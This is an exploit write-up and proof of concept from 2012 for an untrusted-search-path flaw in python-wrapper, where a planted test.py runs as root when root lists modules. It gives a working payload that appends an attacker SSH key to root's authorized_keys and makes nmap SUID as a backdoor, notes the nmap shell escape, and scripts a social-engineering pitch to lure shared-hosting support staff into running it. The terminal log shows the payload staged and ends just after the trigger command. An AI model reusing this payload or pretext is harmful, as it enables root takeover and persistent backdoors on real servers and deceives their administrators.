# python-wrapper untrusted search path/code execution vulnerability
#
# Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules').
# A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper
# while within a non-priviledged user's work directory.
#
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally
# with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not
# work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
#
#
# Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed
# which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program
# with input-output commands.
#
#
# A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment.
# After convincing root(support) to cd in to your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it,
# you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..."
# "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root*
# "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself".
#
#
# - ShadowHatesYou (Shadow@SquatThis.net)
# 6/30/12
root@tourian:/home/shadow/python# ls -hl test.py
-rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
root@tourian:/home/shadow/python# cat test.py
#!/bin/python
import os
os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
root@tourian:/home/shadow/python# python-wrapper
Python 2.7.3 (default, May 4 2012, 00:13:26)
[GCC 4.6.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
